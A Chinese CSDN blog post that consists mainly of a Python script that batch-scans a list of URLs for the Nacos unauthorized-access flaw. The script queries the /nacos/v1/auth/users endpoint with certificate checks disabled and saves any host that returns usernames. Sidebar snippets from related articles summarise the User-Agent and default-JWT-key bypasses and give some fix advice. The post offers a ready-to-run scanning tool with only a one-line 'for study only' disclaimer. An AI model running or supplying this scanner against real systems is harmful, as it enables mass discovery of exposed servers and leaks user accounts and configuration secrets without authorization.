nacos 批量检测 未授权访问

最新推荐文章于 2024-05-16 09:42:23 发布
最新推荐文章于 2024-05-16 09:42:23 发布
阅读量223 收藏
点赞数
文章标签: python 数学建模 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/viki1998/article/details/131285985
版权 
import requests
import urllib3

# 禁用证书验证警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_vulnerability(url):
    try:
        url_with_payload = url + '/nacos/v1/auth/users?pageNo=1&pageSize=9'
        response = requests.get(url_with_payload, verify=False, timeout=3)
        if 'username' in response.text:
            return True, url_with_payload
        else:
            return False, None
    except requests.exceptions.Timeout:
        print(url_with_payload + ' 请求超时,跳过此URL。')
        return False, None
    except requests.exceptions.RequestException as e:
        print(url_with_payload + ' 请求异常: ' + str(e))
        return False, None

def save_vulnerable_url(url):
    with open('target.txt', 'a') as f:
        f.write(url + '\n')

def main():
    with open('url.txt', 'r') as f:
        urls = f.readlines()

    for url in urls:
        url = url.strip()
        is_vulnerable, vulnerable_url = check_vulnerability(url)
        if is_vulnerable:
            print('漏洞存在:', vulnerable_url)
            save_vulnerable_url(vulnerable_url)
        else:
            print('漏洞不存在:', url)

if __name__ == '__main__':
    main()

print('end')

仅供学习和研究使用

v1ch0senkl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nacos授权访问漏洞
00勇士王子的博客
02-27 6308
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Nacos授权访问
zkaqlaoniao的博客
12-08 1498
该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
Nacos漏洞总结复现
最新发布
zzz6583zz的博客
05-16 1049
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos 授权访问漏洞
热门推荐
ljy啊虎的博客
09-07 2万+
Nacos 授权访问漏洞 /nacos/v1/auth/users?pageNo=1&pageSize=9
【渗透实战】Nacos授权访问(CVE-2021-29441)
Nafia的博客
02-20 3138
Nacos授权访问漏洞挖掘记录
src实战-两处nacos授权访问
hackzkaq的博客
10-11 259
前几天刚做过nacos授权访问的靶场,所以今天心血来潮去搜索了一下相关资产,没想到还真找到了。
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该程序可能通过发送特定的HTTP请求,模拟攻击者的尝试,来检测NACOS服务器是否允许授权访问。如果返回的结果表明可以成功绕过身份认证,那么就证明了NACOS服务器存在这个安全漏洞。 为了防止此类漏洞对系统造成...
nacos中数据库数据导入
02-05
nacos中数据库数据导入
k8s部署有状态 nacos2.0.3,通过ingress外网访问
01-06
9. **安全考虑**:在实际部署中,还需考虑安全性,如使用TLS证书进行SSL/TLS加密,限制Ingress的访问策略,以及对Nacos的鉴权和授权设置。 10. **监控和日志**:最后,部署完成后,为了保证服务的稳定性,需要集成...
Nacosnacos-2.2.3)
06-01
Nacos支持基于角色的访问控制(RBAC),可以设置不同的角色和权限,对资源进行精细化的访问控制,确保系统安全。 十、监控与日志 Nacos集成了监控指标和日志功能,可以帮助开发者实时了解系统的运行状态,及时发现...
nacos windows安装包 2.3.1
03-06
1. 端口冲突:确保Nacos的默认端口8848被其他服务占用,如果已被占用,可以在启动命令中通过`-p`参数指定其他端口。 2. 日志输出:Nacos的日志默认保存在启动目录的`logs`文件夹下,根据需要调整日志级别和存储...
【技巧分享】Nacos授权的登录漏洞-任意密码直接登录后台
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-20 4353
Nacos中发现影响Nacos
Nacos授权访问复现及修复
大数据姐姐
01-22 3365
Nacos授权访问修复,开启鉴权
Nacos授权访问修复方案
moonlingh的博客
03-24 4348
Nacos 是 SpringCloud Alibaba 微服务架构中的一个组件,主要作用是服务注册和发现以及分布式配置管理,通常情况下 Nacos 中存储着 MySQL、Redis 等数据库的账号和密码。当前使用的版本存在用户读取、添加、登陆的漏洞。
nacos授权-CVE-2021-29441复现
crowsec
07-21 7666
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Nacos后台系统授权添加管理员
Websec
12-01 4520
2、使用burpsuite构造好请求包,构造的时候需要填好host和端口即可,然后进行repeater,如果返回包显示{"code":200,"message":null,"data":"create user ok!注明:nacos是配置系统,类似于apollo一样,所以生产环境的话会存在很多明文配置好的账号,一般会有redis、mysql、ssh、web等账号。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。'''测试nacos漏洞'''
Nacos授权访问漏洞 修复方法
梵法利亚的博客
12-13 8525
漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 修复方式 若业务环境允许,使用白名单限制相关web项目的访问来降低风险。 官方已发布最新安全版本,请及时下载升级至安全版本。 ...
等保整改之开启Nacos认证-漏扫发现我们使用Nacos时存在授权访问的漏洞
Heartsuit的博客
11-20 2470
我这里相关的服务有:网关服务、系统服务、认证服务、MinIO对象存储服务、WebSocket消息推送服务、定时任务服务、系统监控服务等)的配置文件。部署在专网中,并修改了默认密码),这让我们误以为后续的服务注册、配置读取与更新也是开启认证的。还是之前的一个小项目,部署在专网中,等保在做了一次漏扫后,说是有个高危漏洞要求整改。试想一下,你的服务注册、配置读取与更新接口竟然是暴露的,没有任何认证拦截的;可以直接访问到完整的配置信息,甚至包括各种服务的密码信息等,就问怕不怕。,发现接口403了,真棒。
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制只有授权的用户或者IP可以访问Nacos。可以使用Nacos的权限管理功能来实现。 3. 强化认证和授权:启用强密码策略,使用复杂的密码,并定期更换密码。确保只有授权用户具有适当的权限来访问和管理Nacos。 4. 防火墙设置:配置防火墙来限制对Nacos访问,只允许来自可信源IP地址的请求。 5. 安全审计日志:启用安全审计日志功能,记录所有关键操作和访问日志。这有助于发现异常行为和及时应对潜在的安全威胁。 6. 定期备份:定期备份Nacos的数据,以防止数据丢失或损坏。备份可以帮助你在遭受攻击或数据丢失时快速恢复。 7. 安全漏洞扫描和测试:与安全团队合作,进行定期的安全漏洞扫描和安全测试,以发现并修复潜在的安全问题。 8. 及时响应:如果你发现任何安全问题或漏洞,应立即采取措施进行修复和调查。可以向Nacos官方团队报告漏洞,并升级到已修复漏洞的版本。 请记住,安全是一个持续的过程,需要不断地关注和改进。通过以上措施,你可以提高Nacos安全性,并减少授权访问漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值